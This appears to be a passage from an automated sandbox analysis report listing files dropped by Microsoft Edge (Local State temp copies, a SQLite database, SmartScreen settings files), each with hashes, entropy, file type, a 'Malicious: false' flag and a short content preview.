Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4680d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4683c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48ab8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48b06.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48c6d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4b310.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4efda.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
